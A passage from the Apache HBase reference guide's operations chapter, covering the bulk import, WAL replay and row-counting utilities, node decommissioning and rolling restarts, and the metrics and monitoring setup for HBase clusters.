desired number of versions.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n[[import]]\n=== Import\n\nImport is a utility that will load data that has been exported back into HBase.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\nNOTE: To see usage instructions, run the command with no options.\n\nTo import 0.94 exported files in a 0.96 cluster or onwards, you need to set system property \"hbase.import.version\" when running the import command as below:\n\n----\n$ bin\/hbase -Dhbase.import.version=0.94 org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\n[[importtsv]]\n=== ImportTsv\n\nImportTsv is a utility that will load data in TSV format into HBase.\nIt has two distinct usages: loading data from TSV format in HDFS into HBase via Puts, and preparing StoreFiles to be loaded via the `completebulkload`.\n\nTo load data via Puts (i.e., non-bulk loading):\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c <tablename> <hdfs-inputdir>\n----\n\nTo generate StoreFiles for bulk-loading:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c -Dimporttsv.bulk.output=hdfs:\/\/storefile-outputdir <tablename> <hdfs-data-inputdir>\n----\n\nThese generated StoreFiles can be loaded into HBase via <<completebulkload,completebulkload>>.\n\n[[importtsv.options]]\n==== ImportTsv Options\n\nRunning `ImportTsv` with no arguments prints brief usage information:\n\n----\n\nUsage: importtsv -Dimporttsv.columns=a,b,c <tablename> <inputdir>\n\nImports the given input directory of TSV data into the specified table.\n\nThe column names of the TSV data must be specified using the -Dimporttsv.columns\noption. This option takes the form of comma-separated column names, where each\ncolumn name is either a simple column family, or a columnfamily:qualifier. The special\ncolumn name HBASE_ROW_KEY is used to designate that this column should be used\nas the row key for each imported record. You must specify exactly one column\nto be the row key, and you must specify a column name for every column that exists in the\ninput data.\n\nBy default importtsv will load data directly into HBase. To instead generate\nHFiles of data to prepare for a bulk data load, pass the option:\n -Dimporttsv.bulk.output=\/path\/for\/output\n Note: the target table will be created with default column family descriptors if it does not already exist.\n\nOther options that may be specified with -D include:\n -Dimporttsv.skip.bad.lines=false - fail if encountering an invalid line\n '-Dimporttsv.separator=|' - eg separate on pipes instead of tabs\n -Dimporttsv.timestamp=currentTimeAsLong - use the specified timestamp for the import\n -Dimporttsv.mapper.class=my.Mapper - A user-defined Mapper to use instead of org.apache.hadoop.hbase.mapreduce.TsvImporterMapper\n----\n\n[[importtsv.example]]\n==== ImportTsv Example\n\nFor example, assume that we are loading data into a table called 'datatsv' with a ColumnFamily called 'd' with two columns \"c1\" and \"c2\".\n\nAssume that an input file exists as follows:\n----\n\nrow1\tc1\tc2\nrow2\tc1\tc2\nrow3\tc1\tc2\nrow4\tc1\tc2\nrow5\tc1\tc2\nrow6\tc1\tc2\nrow7\tc1\tc2\nrow8\tc1\tc2\nrow9\tc1\tc2\nrow10\tc1\tc2\n----\n\nFor ImportTsv to use this input file, the command line needs to look like this:\n\n----\n\n HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar importtsv -Dimporttsv.columns=HBASE_ROW_KEY,d:c1,d:c2 -Dimporttsv.bulk.output=hdfs:\/\/storefileoutput datatsv hdfs:\/\/inputfile\n----\n\n\\... and in this example the first column is the rowkey, which is why the HBASE_ROW_KEY is used.\nThe second and third columns in the file will be imported as \"d:c1\" and \"d:c2\", respectively.\n\n[[importtsv.warning]]\n==== ImportTsv Warning\n\nIf you have preparing a lot of data for bulk loading, make sure the target HBase table is pre-split appropriately.\n\n[[importtsv.also]]\n==== See Also\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>\n\n[[completebulkload]]\n=== CompleteBulkLoad\n\nThe `completebulkload` utility will move generated StoreFiles into an HBase table.\nThis utility is often used in conjunction with output from <<importtsv,importtsv>>.\n\nThere are two ways to invoke this utility, with explicit classname and via the driver:\n\n.Explicit Classname\n----\n$ bin\/hbase org.apache.hadoop.hbase.tool.LoadIncrementalHFiles <hdfs:\/\/storefileoutput> <tablename>\n----\n\n.Driver\n----\nHADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar completebulkload <hdfs:\/\/storefileoutput> <tablename>\n----\n\n[[completebulkload.warning]]\n==== CompleteBulkLoad Warning\n\nData generated via MapReduce is often created with file permissions that are not compatible with the running HBase process.\nAssuming you're running HDFS with permissions enabled, those permissions will need to be updated before you run CompleteBulkLoad.\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>.\n\n=== WALPlayer\n\nWALPlayer is a utility to replay WAL files into HBase.\n\nThe WAL can be replayed for a set of tables or all tables, and a timerange can be provided (in milliseconds). The WAL is filtered to this set of tables.\nThe output can optionally be mapped to another set of tables.\n\nWALPlayer can also generate HFiles for later bulk importing, in that case only a single table and no mapping can be specified.\n\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer [options] <wal inputdir> <tables> [<tableMappings>]>\n----\n\nFor example:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer \/backuplogdir oldTable1,oldTable2 newTable1,newTable2\n----\n\nWALPlayer, by default, runs as a mapreduce job.\nTo NOT run WALPlayer as a mapreduce job on your cluster, force it to run all in the local process by adding the flags `-Dmapreduce.jobtracker.address=local` on the command line.\n\n[[rowcounter]]\n=== RowCounter and CellCounter\n\nlink:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/mapreduce\/RowCounter.html[RowCounter] is a mapreduce job to count all the rows of a table.\nThis is a good utility to use as a sanity check to ensure that HBase can read all the blocks of a table if there are any concerns of metadata inconsistency.\nIt will run the mapreduce all in a single process but it will run faster if you have a MapReduce cluster in place for it to exploit. It is also possible to limit\nthe time range of data to be scanned by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.RowCounter <tablename> [<column1> <column2>...]\n----\n\nRowCounter only counts one version per cell.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\nHBase ships another diagnostic mapreduce job called link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/mapreduce\/CellCounter.html[CellCounter].\nLike RowCounter, it gathers more fine-grained statistics about your table.\nThe statistics gathered by RowCounter are more fine-grained and include:\n\n* Total number of rows in the table.\n* Total number of CFs across all rows.\n* Total qualifiers across all rows.\n* Total occurrence of each CF.\n* Total occurrence of each qualifier.\n* Total number of versions of each qualifier.\n\nThe program allows you to limit the scope of the run.\nProvide a row regex or prefix to limit the rows to analyze.\nSpecify a time range to scan the table by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.\n\nUse `hbase.mapreduce.scan.column.family` to specify scanning a single column family.\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.CellCounter <tablename> <outputDir> [regex or prefix]\n----\n\nNote: just like RowCounter, caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n=== mlockall\n\nIt is possible to optionally pin your servers in physical memory making them less likely to be swapped out in oversubscribed environments by having the servers call link:http:\/\/linux.die.net\/man\/2\/mlockall[mlockall] on startup.\nSee link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4391[HBASE-4391 Add ability to\n start RS as root and call mlockall] for how to build the optional library and have it run on startup.\n\n[[compaction.tool]]\n=== Offline Compaction Tool\n\nSee the usage for the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/regionserver\/CompactionTool.html[CompactionTool].\nRun it like:\n\n[source, bash]\n----\n$ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.CompactionTool\n----\n\n=== `hbase clean`\n\nThe `hbase clean` command cleans HBase data from ZooKeeper, HDFS, or both.\nIt is appropriate to use for testing.\nRun it with no options for usage instructions.\nThe `hbase clean` command was introduced in HBase 0.98.\n\n----\n\n$ bin\/hbase clean\nUsage: hbase clean (--cleanZk|--cleanHdfs|--cleanAll)\nOptions:\n --cleanZk cleans hbase related data from zookeeper.\n --cleanHdfs cleans hbase related data from hdfs.\n --cleanAll cleans hbase related data from both zookeeper and hdfs.\n----\n\n=== `hbase pe`\n\nThe `hbase pe` command is a shortcut provided to run the `org.apache.hadoop.hbase.PerformanceEvaluation` tool, which is used for testing.\nThe `hbase pe` command was introduced in HBase 0.98.4.\n\nThe PerformanceEvaluation tool accepts many different options and commands.\nFor usage instructions, run the command with no options.\n\nTo run PerformanceEvaluation prior to HBase 0.98.4, issue the command `hbase org.apache.hadoop.hbase.PerformanceEvaluation`.\n\nThe PerformanceEvaluation tool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, multiget support for RPC calls, increased sampling sizes, an option to randomly sleep during testing, and ability to \"warm up\" the cluster before testing starts.\n\n=== `hbase ltt`\n\nThe `hbase ltt` command is a shortcut provided to run the `org.apache.hadoop.hbase.util.LoadTestTool` utility, which is used for testing.\nThe `hbase ltt` command was introduced in HBase 0.98.4.\n\nYou must specify either `-write` or `-update-read` as the first option.\nFor general usage instructions, pass the `-h` option.\n\nTo run LoadTestTool prior to HBase 0.98.4, issue the command +hbase\n org.apache.hadoop.hbase.util.LoadTestTool+.\n\nThe LoadTestTool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLS and visibility labels, testing security-related features, ability to specify the number of regions per server, tests for multi-get RPC calls, and tests relating to replication.\n\n[[ops.regionmgt]]\n== Region Management\n\n[[ops.regionmgt.majorcompact]]\n=== Major Compaction\n\nMajor compactions can be requested via the HBase shell or link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Admin.html#majorCompact-org.apache.hadoop.hbase.TableName-[Admin.majorCompact].\n\nNote: major compactions do NOT do region merges.\nSee <<compaction,compaction>> for more information about compactions.\n\n[[ops.regionmgt.merge]]\n=== Merge\n\nMerge is a utility that can merge adjoining regions in the same table (see org.apache.hadoop.hbase.util.Merge).\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.util.Merge <tablename> <region1> <region2>\n----\n\nIf you feel you have too many regions and want to consolidate them, Merge is the utility you need.\nMerge must run be done when the cluster is down.\nSee the link:https:\/\/web.archive.org\/web\/20111231002503\/http:\/\/ofps.oreilly.com\/titles\/9781449396107\/performance.html[O'Reilly HBase\n Book] for an example of usage.\n\nYou will need to pass 3 parameters to this application.\nThe first one is the table name.\nThe second one is the fully qualified name of the first region to merge, like \"table_name,\\x0A,1342956111995.7cef47f192318ba7ccc75b1bbf27a82b.\". The third one is the fully qualified name for the second region to merge.\n\nAdditionally, there is a Ruby script attached to link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-1621[HBASE-1621] for region merging.\n\n[[node.management]]\n== Node Management\n\n[[decommission]]\n=== Node Decommission\n\nYou can stop an individual RegionServer by running the following script in the HBase directory on the particular node:\n\n----\n$ .\/bin\/hbase-daemon.sh stop regionserver\n----\n\nThe RegionServer will first close all regions and then shut itself down.\nOn shutdown, the RegionServer's ephemeral node in ZooKeeper will expire.\nThe master will notice the RegionServer gone and will treat it as a 'crashed' server; it will reassign the nodes the RegionServer was carrying.\n\n.Disable the Load Balancer before Decommissioning a node\n[NOTE]\n====\nIf the load balancer runs while a node is shutting down, then there could be contention between the Load Balancer and the Master's recovery of the just decommissioned RegionServer.\nAvoid any problems by disabling the balancer first.\nSee <<lb,lb>> below.\n====\n\n.Kill Node Tool\n[NOTE]\n====\nIn hbase-2.0, in the bin directory, we added a script named _considerAsDead.sh_ that can be used to kill a regionserver.\nHardware issues could be detected by specialized monitoring tools before the zookeeper timeout has expired. _considerAsDead.sh_ is a simple function to mark a RegionServer as dead.\nIt deletes all the znodes of the server, starting the recovery process.\nPlug in the script into your monitoring\/fault detection tools to initiate faster failover.\nBe careful how you use this disruptive tool.\nCopy the script if you need to make use of it in a version of hbase previous to hbase-2.0.\n====\n\nA downside to the above stop of a RegionServer is that regions could be offline for a good period of time.\nRegions are closed in order.\nIf many regions on the server, the first region to close may not be back online until all regions close and after the master notices the RegionServer's znode gone.\nIn Apache HBase 0.90.2, we added facility for having a node gradually shed its load and then shutdown itself down.\nApache HBase 0.90.2 added the _graceful_stop.sh_ script.\nHere is its usage:\n\n----\n$ .\/bin\/graceful_stop.sh\nUsage: graceful_stop.sh [--config &conf-dir>] [--restart] [--reload] [--thrift] [--rest] &hostname>\n thrift If we should stop\/start thrift before\/after the hbase stop\/start\n rest If we should stop\/start rest before\/after the hbase stop\/start\n restart If we should restart after graceful stop\n reload Move offloaded regions back on to the stopped server\n debug Move offloaded regions back on to the stopped server\n hostname Hostname of server we are to stop\n----\n\nTo decommission a loaded RegionServer, run the following: +$\n .\/bin\/graceful_stop.sh HOSTNAME+ where `HOSTNAME` is the host carrying the RegionServer you would decommission.\n\n.On `HOSTNAME`\n[NOTE]\n====\nThe `HOSTNAME` passed to _graceful_stop.sh_ must match the hostname that hbase is using to identify RegionServers.\nCheck the list of RegionServers in the master UI for how HBase is referring to servers.\nIt's usually hostname but can also be FQDN.\nWhatever HBase is using, this is what you should pass the _graceful_stop.sh_ decommission script.\nIf you pass IPs, the script is not yet smart enough to make a hostname (or FQDN) of it and so it will fail when it checks if server is currently running; the graceful unloading of regions will not run.\n====\n\nThe _graceful_stop.sh_ script will move the regions off the decommissioned RegionServer one at a time to minimize region churn.\nIt will verify the region deployed in the new location before it will moves the next region and so on until the decommissioned server is carrying zero regions.\nAt this point, the _graceful_stop.sh_ tells the RegionServer `stop`.\nThe master will at this point notice the RegionServer gone but all regions will have already been redeployed and because the RegionServer went down cleanly, there will be no WAL logs to split.\n\n[[lb]]\n.Load Balancer\n[NOTE]\n====\nIt is assumed that the Region Load Balancer is disabled while the `graceful_stop` script runs (otherwise the balancer and the decommission script will end up fighting over region deployments). Use the shell to disable the balancer:\n\n[source]\n----\nhbase(main):001:0> balance_switch false\ntrue\n0 row(s) in 0.3590 seconds\n----\n\nThis turns the balancer OFF.\nTo reenable, do:\n\n[source]\n----\nhbase(main):001:0> balance_switch true\nfalse\n0 row(s) in 0.3590 seconds\n----\n\nThe `graceful_stop` will check the balancer and if enabled, will turn it off before it goes to work.\nIf it exits prematurely because of error, it will not have reset the balancer.\nHence, it is better to manage the balancer apart from `graceful_stop` reenabling it after you are done w\/ graceful_stop.\n====\n\n[[draining.servers]]\n==== Decommissioning several Regions Servers concurrently\n\nIf you have a large cluster, you may want to decommission more than one machine at a time by gracefully stopping multiple RegionServers concurrently.\nTo gracefully drain multiple regionservers at the same time, RegionServers can be put into a \"draining\" state.\nThis is done by marking a RegionServer as a draining node by creating an entry in ZooKeeper under the _hbase_root\/draining_ znode.\nThis znode has format `name,port,startcode` just like the regionserver entries under _hbase_root\/rs_ znode.\n\nWithout this facility, decommissioning multiple nodes may be non-optimal because regions that are being drained from one region server may be moved to other regionservers that are also draining.\nMarking RegionServers to be in the draining state prevents this from happening.\nSee this link:http:\/\/inchoate-clatter.blogspot.com\/2012\/03\/hbase-ops-automation.html[blog\n post] for more details.\n\n[[bad.disk]]\n==== Bad or Failing Disk\n\nIt is good having <<dfs.datanode.failed.volumes.tolerated,dfs.datanode.failed.volumes.tolerated>> set if you have a decent number of disks per machine for the case where a disk plain dies.\nBut usually disks do the \"John Wayne\" -- i.e.\ntake a while to go down spewing errors in _dmesg_ -- or for some reason, run much slower than their companions.\nIn this case you want to decommission the disk.\nYou have two options.\nYou can link:https:\/\/wiki.apache.org\/hadoop\/FAQ#I_want_to_make_a_large_cluster_smaller_by_taking_out_a_bunch_of_nodes_simultaneously._How_can_this_be_done.3F[decommission\n the datanode] or, less disruptive in that only the bad disks data will be rereplicated, can stop the datanode, unmount the bad volume (You can't umount a volume while the datanode is using it), and then restart the datanode (presuming you have set dfs.datanode.failed.volumes.tolerated > 0). The regionserver will throw some errors in its logs as it recalibrates where to get its data from -- it will likely roll its WAL log too -- but in general but for some latency spikes, it should keep on chugging.\n\n.Short Circuit Reads\n[NOTE]\n====\nIf you are doing short-circuit reads, you will have to move the regions off the regionserver before you stop the datanode; when short-circuiting reading, though chmod'd so regionserver cannot have access, because it already has the files open, it will be able to keep reading the file blocks from the bad disk even though the datanode is down.\nMove the regions back after you restart the datanode.\n====\n\n[[rolling]]\n=== Rolling Restart\n\nSome cluster configuration changes require either the entire cluster, or the RegionServers, to be restarted in order to pick up the changes.\nIn addition, rolling restarts are supported for upgrading to a minor or maintenance release, and to a major release if at all possible.\nSee the release notes for release you want to upgrade to, to find out about limitations to the ability to perform a rolling upgrade.\n\nThere are multiple ways to restart your cluster nodes, depending on your situation.\nThese methods are detailed below.\n\n==== Using the `rolling-restart.sh` Script\n\nHBase ships with a script, _bin\/rolling-restart.sh_, that allows you to perform rolling restarts on the entire cluster, the master only, or the RegionServers only.\nThe script is provided as a template for your own script, and is not explicitly tested.\nIt requires password-less SSH login to be configured and assumes that you have deployed using a tarball.\nThe script requires you to set some environment variables before running it.\nExamine the script and modify it to suit your needs.\n\n._rolling-restart.sh_ General Usage\n====\n----\n\n$ .\/bin\/rolling-restart.sh --help\nUsage: rolling-restart.sh [--config <hbase-confdir>] [--rs-only] [--master-only] [--graceful] [--maxthreads xx]\n----\n====\n\nRolling Restart on RegionServers Only::\n To perform a rolling restart on the RegionServers only, use the `--rs-only` option.\n This might be necessary if you need to reboot the individual RegionServer or if you make a configuration change that only affects RegionServers and not the other HBase processes.\n\nRolling Restart on Masters Only::\n To perform a rolling restart on the active and backup Masters, use the `--master-only` option.\n You might use this if you know that your configuration change only affects the Master and not the RegionServers, or if you need to restart the server where the active Master is running.\n\nGraceful Restart::\n If you specify the `--graceful` option, RegionServers are restarted using the _bin\/graceful_stop.sh_ script, which moves regions off a RegionServer before restarting it.\n This is safer, but can delay the restart.\n\nLimiting the Number of Threads::\n To limit the rolling restart to using only a specific number of threads, use the `--maxthreads` option.\n\n[[rolling.restart.manual]]\n==== Manual Rolling Restart\n\nTo retain more control over the process, you may wish to manually do a rolling restart across your cluster.\nThis uses the `graceful-stop.sh` command <<decommission,decommission>>.\nIn this method, you can restart each RegionServer individually and then move its old regions back into place, retaining locality.\nIf you also need to restart the Master, you need to do it separately, and restart the Master before restarting the RegionServers using this method.\nThe following is an example of such a command.\nYou may need to tailor it to your environment.\nThis script does a rolling restart of RegionServers only.\nIt disables the load balancer before moving the regions.\n\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i; done &> \/tmp\/log.txt &;\n----\n\nMonitor the output of the _\/tmp\/log.txt_ file to follow the progress of the script.\n\n==== Logic for Crafting Your Own Rolling Restart Script\n\nUse the following guidelines if you want to create your own rolling restart script.\n\n. Extract the new release, verify its configuration, and synchronize it to all nodes of your cluster using `rsync`, `scp`, or another secure synchronization mechanism.\n. Use the hbck utility to ensure that the cluster is consistent.\n+\n----\n\n$ .\/bin\/hbck\n----\n+\nPerform repairs if required.\nSee <<hbck,hbck>> for details.\n\n. Restart the master first.\n You may need to modify these commands if your new HBase directory is different from the old one, such as for an upgrade.\n+\n----\n\n$ .\/bin\/hbase-daemon.sh stop master; .\/bin\/hbase-daemon.sh start master\n----\n\n. Gracefully restart each RegionServer, using a script such as the following, from the Master.\n+\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i; done &> \/tmp\/log.txt &\n----\n+\nIf you are running Thrift or REST servers, pass the --thrift or --rest options.\nFor other available options, run the `bin\/graceful-stop.sh --help` command.\n+\nIt is important to drain HBase regions slowly when restarting multiple RegionServers.\nOtherwise, multiple regions go offline simultaneously and must be reassigned to other nodes, which may also go offline soon.\nThis can negatively affect performance.\nYou can inject delays into the script above, for instance, by adding a Shell command such as `sleep`.\nTo wait for 5 minutes between each RegionServer restart, modify the above script to the following:\n+\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i & sleep 5m; done &> \/tmp\/log.txt &\n----\n\n. Restart the Master again, to clear out the dead servers list and re-enable the load balancer.\n. Run the `hbck` utility again, to be sure the cluster is consistent.\n\n[[adding.new.node]]\n=== Adding a New Node\n\nAdding a new regionserver in HBase is essentially free, you simply start it like this: `$ .\/bin\/hbase-daemon.sh start regionserver` and it will register itself with the master.\nIdeally you also started a DataNode on the same machine so that the RS can eventually start to have local files.\nIf you rely on ssh to start your daemons, don't forget to add the new hostname in _conf\/regionservers_ on the master.\n\nAt this point the region server isn't serving data because no regions have moved to it yet.\nIf the balancer is enabled, it will start moving regions to the new RS.\nOn a small\/medium cluster this can have a very adverse effect on latency as a lot of regions will be offline at the same time.\nIt is thus recommended to disable the balancer the same way it's done when decommissioning a node and move the regions manually (or even better, using a script that moves them one by one).\n\nThe moved regions will all have 0% locality and won't have any blocks in cache so the region server will have to use the network to serve requests.\nApart from resulting in higher latency, it may also be able to use all of your network card's capacity.\nFor practical purposes, consider that a standard 1GigE NIC won't be able to read much more than _100MB\/s_.\nIn this case, or if you are in a OLAP environment and require having locality, then it is recommended to major compact the moved regions.\n\n[[hbase_metrics]]\n== HBase Metrics\n\nHBase emits metrics which adhere to the link:https:\/\/hadoop.apache.org\/docs\/stable\/hadoop-project-dist\/hadoop-common\/Metrics.html[Hadoop Metrics] API.\nStarting with HBase 0.95footnote:[The Metrics system was redone in\n HBase 0.96. See Migration\n to the New Metrics Hotness \u2013 Metrics2 by Elliot Clark for detail], HBase is configured to emit a default set of metrics with a default sampling period of every 10 seconds.\nYou can use HBase metrics in conjunction with Ganglia.\nYou can also filter which metrics are emitted and extend the metrics framework to capture custom metrics appropriate for your environment.\n\n=== Metric Setup\n\nFor HBase 0.95 and newer, HBase ships with a default metrics configuration, or [firstterm]_sink_.\nThis includes a wide variety of individual metrics, and emits them every 10 seconds by default.\nTo configure metrics for a given region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file.\nRestart the region server for the changes to take effect.\n\nTo change the sampling rate for the default sink, edit the line beginning with `*.period`.\nTo filter which metrics are emitted or to extend the metrics framework, see https:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html\n\n.HBase Metrics and Ganglia\n[NOTE]\n====\nBy default, HBase emits a large number of metrics per region server.\nGanglia may have difficulty processing all these metrics.\nConsider increasing the capacity of the Ganglia server or reducing the number of metrics emitted by HBase.\nSee link:https:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html#filtering[Metrics Filtering].\n====\n\n=== Disabling Metrics\n\nTo disable metrics for a region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file and comment out any uncommented lines.\nRestart the region server for the changes to take effect.\n\n[[discovering.available.metrics]]\n=== Discovering Available Metrics\n\nRather than listing each metric which HBase emits by default, you can browse through the available metrics, either as a JSON output or via JMX.\nDifferent metrics are exposed for the Master process and each region server process.\n\n.Procedure: Access a JSON Output of Available Metrics\n. After starting HBase, access the region server's web UI, at pass:[http:\/\/REGIONSERVER_HOSTNAME:60030] by default (or port 16030 in HBase 1.0+).\n. Click the [label]#Metrics Dump# link near the top.\n The metrics for the region server are presented as a dump of the JMX bean in JSON format.\n This will dump out all metrics names and their values.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60030\/jmx?description=true].\n Not all beans and attributes have descriptions.\n. To view metrics for the Master, connect to the Master's web UI instead (defaults to pass:[http:\/\/localhost:60010] or port 16010 in HBase 1.0+) and click its [label]#Metrics\n Dump# link.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60010\/jmx?description=true].\n Not all beans and attributes have descriptions.\n\n\nYou can use many different tools to view JMX content by browsing MBeans.\nThis procedure uses `jvisualvm`, which is an application usually available in the JDK.\n\n.Procedure: Browse the JMX Output of Available Metrics\n. Start HBase, if it is not already running.\n. Run the command `jvisualvm` command on a host with a GUI display.\n You can launch it from the command line or another method appropriate for your operating system.\n. Be sure the [label]#VisualVM-MBeans# plugin is installed. Browse to *Tools -> Plugins*. Click [label]#Installed# and check whether the plugin is listed.\n If not, click [label]#Available Plugins#, select it, and click btn:[Install].\n When finished, click btn:[Close].\n. To view details for a given HBase process, double-click the process in the [label]#Local# sub-tree in the left-hand panel.\n A detailed view opens in the right-hand panel.\n Click the [label]#MBeans# tab which appears as a tab in the top of the right-hand panel.\n. To access the HBase metrics, navigate to the appropriate sub-bean:\n.* Master:\n.* RegionServer:\n\n. The name of each metric and its current value is displayed in the [label]#Attributes# tab.\n For a view which includes more details, including the description of each attribute, click the [label]#Metadata# tab.\n\n=== Units of Measure for Metrics\n\nDifferent metrics are expressed in different units, as appropriate.\nOften, the unit of measure is in the name (as in the metric `shippedKBs`). Otherwise, use the following guidelines.\nWhen in doubt, you may need to examine the source for a given metric.\n\n* Metrics that refer to a point in time are usually expressed as a timestamp.\n* Metrics that refer to an age (such as `ageOfLastShippedOp`) are usually expressed in milliseconds.\n* Metrics that refer to memory sizes are in bytes.\n* Sizes of queues (such as `sizeOfLogQueue`) are expressed as the number of items in the queue.\n Determine the size by multiplying by the block size (default is 64 MB in HDFS).\n* Metrics that refer to things like the number of a given type of operations (such as `logEditsRead`) are expressed as an integer.\n\n[[master_metrics]]\n=== Most Important Master Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.master.numRegionServers::\n Number of live regionservers\n\nhbase.master.numDeadRegionServers::\n Number of dead regionservers\n\nhbase.master.ritCount ::\n The number of regions in transition\n\nhbase.master.ritCountOverThreshold::\n The number of regions that have been in transition longer than a threshold time (default: 60 seconds)\n\nhbase.master.ritOldestAge::\n The age of the longest region in transition, in milliseconds\n\n[[rs_metrics]]\n=== Most Important RegionServer Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.regionserver.regionCount::\n The number of regions hosted by the regionserver\n\nhbase.regionserver.storeFileCount::\n The number of store files on disk currently managed by the regionserver\n\nhbase.regionserver.storeFileSize::\n Aggregate size of the store files on disk\n\nhbase.regionserver.hlogFileCount::\n The number of write ahead logs not yet archived\n\nhbase.regionserver.totalRequestCount::\n The total number of requests received\n\nhbase.regionserver.readRequestCount::\n The number of read requests received\n\nhbase.regionserver.writeRequestCount::\n The number of write requests received\n\nhbase.regionserver.numOpenConnections::\n The number of open connections at the RPC layer\n\nhbase.regionserver.numActiveHandler::\n The number of RPC handlers actively servicing requests\n\nhbase.regionserver.numCallsInGeneralQueue::\n The number of currently enqueued user requests\n\nhbase.regionserver.numCallsInReplicationQueue::\n The number of currently enqueued operations received from replication\n\nhbase.regionserver.numCallsInPriorityQueue::\n The number of currently enqueued priority (internal housekeeping) requests\n\nhbase.regionserver.flushQueueLength::\n Current depth of the memstore flush queue.\n If increasing, we are falling behind with clearing memstores out to HDFS.\n\nhbase.regionserver.updatesBlockedTime::\n Number of milliseconds updates have been blocked so the memstore can be flushed\n\nhbase.regionserver.compactionQueueLength::\n Current depth of the compaction request queue.\n If increasing, we are falling behind with storefile compaction.\n\nhbase.regionserver.blockCacheHitCount::\n The number of block cache hits\n\nhbase.regionserver.blockCacheMissCount::\n The number of block cache misses\n\nhbase.regionserver.blockCacheExpressHitPercent ::\n The percent of the time that requests with the cache turned on hit the cache\n\nhbase.regionserver.percentFilesLocal::\n Percent of store file data that can be read from the local DataNode, 0-100\n\nhbase.regionserver.<op>_<measure>::\n Operation latencies, where <op> is one of Append, Delete, Mutate, Get, Replay, Increment; and where <measure> is one of min, max, mean, median, 75th_percentile, 95th_percentile, 99th_percentile\n\nhbase.regionserver.slow<op>Count ::\n The number of operations we thought were slow, where <op> is one of the list above\n\nhbase.regionserver.GcTimeMillis::\n Time spent in garbage collection, in milliseconds\n\nhbase.regionserver.GcTimeMillisParNew::\n Time spent in garbage collection of the young generation, in milliseconds\n\nhbase.regionserver.GcTimeMillisConcurrentMarkSweep::\n Time spent in garbage collection of the old generation, in milliseconds\n\nhbase.regionserver.authenticationSuccesses::\n Number of client connections where authentication succeeded\n\nhbase.regionserver.authenticationFailures::\n Number of client connection authentication failures\n\nhbase.regionserver.mutationsWithoutWALCount ::\n Count of writes submitted with a flag indicating they should bypass the write ahead log\n\n[[ops.monitoring]]\n== HBase Monitoring\n\n[[ops.monitoring.overview]]\n=== Overview\n\nThe following metrics are arguably the most important to monitor for each RegionServer for \"macro monitoring\", preferably with a system like link:http:\/\/opentsdb.net\/[OpenTSDB].\nIf your cluster is having performance issues it's likely that you'll see something unusual with this group.\n\nHBase::\n * See <<rs_metrics,rs metrics>>\n\nOS::\n * IO Wait\n * User CPU\n\nJava::\n * GC\n\nFor more information on HBase metrics, see <<hbase_metrics,hbase metrics>>.\n\n[[ops.slow.query]]\n=== Slow Query Log\n\nThe HBase slow query log consists of parseable JSON structures describing the properties of those client operations (Gets, Puts, Deletes, etc.) that either took too long to run, or produced too much output.\nThe thresholds for \"too long to run\" and \"too much output\" are configurable, as described below.\nThe output is produced inline in the main region server logs so that it is easy to discover further details from context with other logged events.\nIt is also prepended with identifying tags `(responseTooSlow)`, `(responseTooLarge)`, `(operationTooSlow)`, and `(operationTooLarge)` in order to enable easy filtering with grep, in case the user desires to see only slow queries.\n\n==== Configuration\n\nThere are two configuration knobs that can be used to adjust the thresholds for when queries are logged.\n\n* `hbase.ipc.warn.response.time` Maximum number of 